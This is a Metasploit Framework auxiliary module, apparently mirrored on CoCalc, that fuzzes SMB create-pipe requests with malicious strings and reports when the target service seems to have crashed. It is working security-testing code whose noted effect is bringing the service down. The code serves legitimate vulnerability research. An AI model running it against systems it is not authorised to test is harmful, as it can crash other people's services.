Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'English'
7
class MetasploitModule < Msf::Auxiliary
8
include Msf::Exploit::Remote::SMB::Client
9
include Msf::Auxiliary::Fuzzer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'SMB Create Pipe Request Fuzzer',
16
'Description' => %q{
17
This module sends a series of SMB create pipe
18
requests using malicious strings.
19
},
20
'Author' => [ 'hdm' ],
21
'License' => MSF_LICENSE,
22
'Notes' => {
23
'Stability' => [CRASH_SERVICE_DOWN],
24
'SideEffects' => [],
25
'Reliability' => []
26
}
27
)
28
)
29
end
30
31
def do_smb_create(pkt, _opts = {})
32
@connected = false
33
connect
34
smb_login
35
@connected = true
36
smb_create('\\' + pkt)
37
end
38
39
def run
40
last_str = nil
41
last_inp = nil
42
last_err = nil
43
44
cnt = 0
45
46
fuzz_strings do |str|
47
cnt += 1
48
49
if (cnt % 100 == 0)
50
print_status("Fuzzing with iteration #{cnt} using #{@last_fuzzer_input}")
51
end
52
53
begin
54
do_smb_create(str, 0.25)
55
rescue ::Interrupt
56
print_status("Exiting on interrupt: iteration #{cnt} using #{@last_fuzzer_input}")
57
raise $ERROR_INFO
58
rescue StandardError => e
59
last_err = e
60
ensure
61
disconnect
62
end
63
64
if !@connected
65
if last_str
66
print_status("The service may have crashed: iteration:#{cnt - 1} method=#{last_inp} string=#{last_str.unpack('H*')[0]} error=#{last_err}")
67
else
68
print_status("Could not connect to the service: #{last_err}")
69
end
70
return
71
end
72
73
last_str = str
74
last_inp = @last_fuzzer_input
75
end
76
end
77
end
78
79